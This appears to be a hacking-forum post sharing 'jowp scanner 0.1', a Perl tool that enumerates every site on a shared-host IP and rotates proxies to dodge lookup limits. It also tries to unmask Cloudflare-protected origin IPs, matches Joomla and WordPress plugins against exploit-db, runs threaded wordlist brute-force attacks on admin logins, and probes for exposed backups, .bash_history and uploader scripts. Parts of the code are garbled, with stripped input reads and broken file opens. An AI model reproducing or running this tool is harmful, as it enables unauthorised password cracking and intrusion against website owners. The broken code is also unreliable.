Perl jowp scanner 0.1

[sQuo]

[HIDE-THANKS]

[LENGUAJE=perl]#!/usr/bin/perl

# jowp scanner 0.1

# © sec4ever

use LWP::UserAgent;

use WWW::Mechanize;

use threads;

$ua = LWP::UserAgent->new(keep_alive => 1);

$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");

$ua->timeout(30);

$defext = "php";

$| = 1;

$threads = 10;

head();

print "[+] Enter ip - site[(s) file] : ";

$choice=;

chomp($choice);

if ($choice =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/)

{

print " + you're entering an ip address : ".$choice."\n";

dojob($choice);

}

elsif($choice =~ /\.txt/)

{

print " + you are entering a file : ".$choice."\n";

open(sites, "

@sites=;

close(sites);

print " + Total Sites : ".scalar(@sites)."\n";

}else{

print " + you are entering a site : ".$choice."\n";

$ip = getip($choice);

print " + ip : ".$ip."\n";

dojob($ip);

}

sub dojob {

ureverse($_[0]);

open(sites, "
@sites=;

close(sites);

}

foreach $site (@sites)

{

chomp($site);

$main = $ua->get("http://".$site."/")->content;

if ($main =~ m/joomla/ || $main =~ m/\/component\// || $main =~ m/com\_/) {

print " * ".$site." joomla\n";

scanjoomla($site);

brutjoomla($site);

check($site);

} elsif ($main =~ /wordpress/ || $main =~ /wp\-content/ || $main =~ /wp\-includes/)

{

print " * ".$site." wordpress\n";

scanwordpress($site);

brutwordpress($site);

check($site);

}else{

print " * ".$site." unknown\n";

check($site);

}

}

sub check {

checkdirs($_[0]);

checkcommon($_[0]);

}

sub ureverse {

reversesned:

$response = $ua->post("http://domains.yougetsignal.com/domains.php",

{ remoteAddress => $_[0]});

$pwnd = $response->content;

if ($pwnd =~ /Daily reverse IP check limit reached for/)

{

print " - limit reached, bypassing ...\n";

$getproxy = gproxy();

$ua->proxy('http', $getproxy);

goto reversesned;

}elsif ($pwnd =~ /\"domainCount\":\"(.*?)\"/){

print " + Total Sites : ".$1."\n";

while ($pwnd =~ m/\[\"(.*?)\",/sg){

$group{$1} = undef;

}

foreach $s (keys %group) {

savefile("sites-".$_[0].".txt",$s);

}

}

}

sub gproxy {

open(DAT,"proxies.txt");

@proxys=;

close(DAT);

foreach $proxy (@proxys)

{

chomp($proxy);

$proxy = "http://".$proxy if ($proxy !~ m/http:\/\//);

$ua->proxy('http', $proxy);

if ($ua->get("http://domains.yougetsignal.com/domains.php")->content !~ /Daily reverse IP check limit reached for/)

{

print "+ ".$proxy." valid \n";

$ua->proxy('http', $proxy);

return $proxy;

}

}

}

sub getip {

$getip = $ua->get("http://".$_[0]."/");

$getiphead = $getip->headers()->as_string;

if ($getiphead =~ /Server: cloudflare-nginx/)

{

print " + Cloudflare Detected , bypassing ...\n";

cloudbypass($_[0]);

subdom($_[0]);

print "\n * Enter an ip to use : ";

chomp($nip=);

return $nip;

}elsif ($getiphead =~ /Client-Peer: (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):/)

{

chomp($1);

return $1;

}

else{

$!;

print " error here 1\n";

}

}

sub cloudbypass{

my $cloudbypass = $ua->post("http://www.cloudflare-watch.org/cgi-bin/cfsearch.cgi",

{

cfS => $_[0],

});

if ($cloudbypass->content =~ m/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/){

chomp($1);

print " + method 1, ip : ".$1."\n";

}else{

print " - Can't, using method 2 \n";

}

}

sub subdom {

open(subs,"subs.txt");

@subs=;

close(subs);

foreach $sub (@subs)

{

chomp($sub);

$getsub = $ua->get("http://".$sub.".".$_[0]."/");

$getsubhead = $getsub->headers()->as_string;

if ($getsubhead !~ /Client-Warning: Internal response/)

{

if ($getsubhead !~ /Server: cloudflare-nginx/)

{

print " + ".$sub.".".$_[0]." ";

print $getsubhead =~ /Client-Peer: (.*?):/ ? $1."\n" : " can't get ip\n";

}

else

{

print " + ".$sub.".".$_[0]." ";

print $getsubhead =~ /Client-Peer: (.*?):/ ? $1." is under cloudflare\n" : " can't get ip\n";

}

}else{

print " - ".$sub.".".$_[0]." not found\n";

}

}

}

sub scanjoomla {

$scanjoom = $ua->get("http://".$_[0]."/index.php");

$scanjoomcont = $scanjoom->content;

while ($scanjoomcont =~ /\/components\/(.*?)\//gi){$compo1{$1} = undef;}

while ($scanjoomcont =~ /\?option=(.*?)\&amp\;/gi){$compo2{$1} = undef;}

while ($scanjoomcont =~ /\/component\/option\,(.*?)\//gi){$compo3{$1} = undef;}

while ($scanjoomcont =~ /\/index\.php\/component\/(.*?)\//gi){$compo4{$1} = undef;}

#\/index\.php\/component\/(.*?)\/

foreach $com1 (keys %compo1) {push(@compo,$com1);}

foreach $com2 (keys %compo2) {push(@compo,$com2);}

foreach $com3 (keys %compo3) {push(@compo,$com3);}

foreach $com4 (keys %compo4) {push(@compo,$com4);}

print " + components \n";

foreach $com (uniq(@compo))

{

print "\t\t# ".$com." : ";

checkexdb($com);

}

print "\n";

}

sub scanwordpress {

#preg_match_all('#/wp-content/plugins/(.*?)/#si', $metals , $amks );

#preg_match_all('##si', $metals , $amks2 );

#

$scanwp = $ua->get("http://".$_[0]."/");

$scanwpcont = $scanwp->content;

while ($scanwpcont =~ /\/wp\-content\/plugins\/(.*?)\//gi){$plug1{$1} = undef;}

if ($scanwpcont =~ /\/wp\-content\/themes\/(.*?)\//gi){push(@plug,$1);}

foreach $plu1 (keys %plug1) {push(@plug,$plu1);}

print " + plugin \n";

foreach $plu (uniq(@plug))

{

print "\t\t# ".$plu." : ";

checkexdb($plu);

}

print "\n";

}

sub checkexdb {

$checkexdbex = $ua->get("http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$_[0]."&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve");

$checkexdbexcont = $checkexdbex->content;

#s http://www.exploit-db.com/exploits/'>http://www.exploit-db.com/exploits/

my %checkjoomex;

if ($checkexdbexcont !~ /\">No results/)

{

while ($checkexdbexcont =~ m/\/exploits\/(.*?)[\n]?/gi)

{

$checkjoomex{$1} = undef;

}

foreach $ex (keys %checkjoomex) {

@ex = split(/">/,$ex);

print "\n\t\t\t ".@ex[1]."\n";

print "\t\t\t http://www.exploit-db.com/exploits/".@ex[0]."\n";

}

}

else

{

print "no exploit\n";

}

@ex = undef;

}

sub brutwordpress {

@usrs = undef;

@pwds = undef;

print " + bruteforcing (threads: $threads)\n";

$bwpred = "http://".$_[0]."/wp-admin/";

$bwpu = getadminwp($_[0]);

if (length($bwpu)

print " - faild to get admin name, using list\n";

open (usr, "
@usrs = ;

close usr;

@usergenwp = split(/\./,$_[0]);

push(@usrs,$_[0]);

push(@users,@usergenwp[0]);

}else{

print " + found admin name : ".$bwpu."\n";

@usrs = ($bwpu);

}

open (pwd, "
@pwds = ;

close pwd;

@passgenwp = split(/\./,$_[0]);

push(@pwds,@passgenwp[0]);

foreach $usr (@usrs) {

foreach $pwd (@pwds) {

chomp($usr);

chomp($pwd);

push(@threads, threads->create (\&bfwp2, $_[0],$usr,$pwd,$bwpred));

sleep(1) while(scalar threads->list(threads::running) >= $threads);

}

}

$_->join foreach @threads;

@threads = ();

}

sub bfwp2

{

eval {

$wpbf = WWW::Mechanize->new(timeout => 10);

$wpbf->get("http://".$_[0]."/wp-login.php");

$wpbf->submit_form(

fields => {

"log" => $_[1],

"pwd" => $_[2],

"redirect_to" => $_[3],

"testcookie" => "1",});

};

if($wpbf->content() =~ /wp-admin\/load-styles/){

print "\t# cracked, user: ".$_[1]." pass: ".$_[2]."\n";

}else{

print "\t- faild, user: ".$_[1]." pass: ".$_[2];

print "\n";

}

}

sub brutjoomla {

@usrs = undef;

@pwds = undef;

print " + bruteforcing (threads: $threads)\n";

$jotoken = getjooken($_[0]);

open (usr, "
@usrs = ;

close usr;

open (pwd, "
@pwds = ;

close pwd;

push(@usrs,$_[0]);

push(@pwds,$_[0]);

@authgen = split(/\./,$_[0]);

push(@usrs,@authgen[0]);

push(@pwds,@authgen[0]);

foreach $usr (@usrs) {

foreach $pwd (@pwds) {

chomp($usr);

chomp($pwd);

push(@threads, threads->create (\&bfjo2, $_[0],$usr,$pwd,$jotoken));

sleep(1) while(scalar threads->list(threads::running) >= $threads);

}

}

$_->join foreach @threads;

@threads = ();

}

sub bfjo2

{

eval {

$jobfr = WWW::Mechanize->new(timeout => 10);

$jobfr->get("http://".$_[0]."/administrator/index.php");

$jobfr->submit_form(

fields => {

username => $_[1],

passwd => $_[2],

task => 'login',

$_[3] => '1',

});

};

if($jobfr->content() =~ /com_categories/i || $jobfr->content() =~ /com_config/i || $jobfr->content() =~ /com_admin/i){

print "\t# cracked, user: ".$_[1]." pass: ".$_[2]."\n";

}else{

print "\t- faild, user: ".$_[1]." pass: ".$_[2];

}

print "\n";

}

sub getadminwp {

$getadmin = $ua->get("http://".$_[0]."?author=1");

$getadminhead = $getadmin->headers()->as_string;

$getadmincont = $getadmin->content;

if ($getadmincont =~ /

(.*?) \| /)
{

chomp($1);

return($1);

}elsif ($getadminhead =~ /Title: (.*?) /)

{

chomp($1);

return($1);

}

}

sub checkdirs {

print " + scanning dirs \n";

open (dir, "
@dirs =

;
close dir;

$countd=0;

@tocheckfiles = undef;

foreach $dir (@dirs) {

chomp($dir);

$countd++;

$scanp = $ua->get("http://".$_[0]."/".$dir."/");

if ($scanp->status_line !~ /404/){

if ($scanp->status_line =~ /Bad hostname\)/)

{

print "\t - cant connect to site\n";}else{

print "\r\t ".$countd."/".scalar(@dirs)." + found : http://".$_[0]."/".$dir."/ ".$scanp->status_line."\n";

push(@tocheckfiles,$dir);

}}

else{

print "\r\t ".$countd."/".scalar(@dirs)." - not found : http://".$_[0]."/".$dir."/ ";

}

}

print "\n";

foreach $tocheckdir (uniq(@tocheckfiles)) {checkfiles($_[0],"/".$tocheckdir);}

}

sub checkfiles {

# bam bam

print " + scanning files for dir : ".$_[1]."\n";

open (path, "
@paths = ;

close path;

$countp=0;

$scanpi = $ua->get("http://".$_[0]."/");

$scanphead = $scanpi->headers()->as_string;

if ($scanphead =~ /X-Powered-By\: PHP/){@ext = ("php");print "\t using extention : php for files\n";}elsif($scanphead =~ /X-Powered-By\: ASP\.NET/){ @ext = ("aspx","asp"); print "\t using extention : aspx,asp for files\n"; }else{@ext = ($defext); print "\t using default extention : ".$defext." for files\n";}

foreach $filescan (@paths) {

chomp($filescan);

$countp++;

foreach $fext (@ext)

{

$scanp = $ua->get("http://".$_[0].$_[1]."/".$filescan.".".$fext);

if ($scanp->status_line !~ /404/){

if ($scanp->status_line =~ /Bad hostname\)/)

{

print "\t - cant connect to site\n";}else{

print "\r\t ".$countp."/".scalar(@paths)." + found : http://".$_[0].$_[1]."/".$filescan.".".$fext." ".$scanp->status_line."\n";

}

}

else{

print "\r\t ".$countp."/".scalar(@paths)." - not found : http://".$_[0].$_[1]."/".$filescan.".".$fext;

}

}

}

print "\n";

}

sub checkcommon {

print " + scanning common files \n";

@cpaths = ("validator.php","uploader.php","vbseo.php","test.txt","test.zip","public_html.zip","pulic_html.rar","public_html.tar.gz","backup.zip","backup.tar.gz",".bash_history","error_log","domlogs");

$countcp=0;

foreach $filecscan (@cpaths) {

chomp($filecscan);

$countcp++;

$scanpc = $ua->get("http://".$_[0]."/".$filecscan);

if ($scanpc->status_line !~ /404/){

if ($scanpc->status_line =~ /Bad hostname\)/)

{

print "\t - cant connect to site\n";}else{

print "\r\t ".$countcp."/".scalar(@cpaths)." + found : http://".$_[0]."/".$filecscan." ".$scanpc->status_line."\n";

}

}

else{

print "\r\t ".$countcp."/".scalar(@cpaths)." - not found : http://".$_[0]."/".$filecscan;

}

}

print "\n";

}

sub getjooken {

$gjotoken = WWW::Mechanize->new();

$gjotoken->get("http://".$_[0]."/administrator/index.php");

if($gjotoken->content() =~ /([0-9a-fA-F]{32})/){

print " + found token \n";

chomp($1);

return $1;

} else {

print " - can't get token \n";

next;

}

}

sub savefile {

open (save,">>".$_[0]);

print save $_[1]."\n";

close save;

}

sub uniq {

return keys %{{ map { $_ => 1 } @_ }};

}

sub head {

print qq {

[+] jowp scanner 0.1

[+] © sec4ever

}

}[/LENGUAJE][/HIDE-THANKS]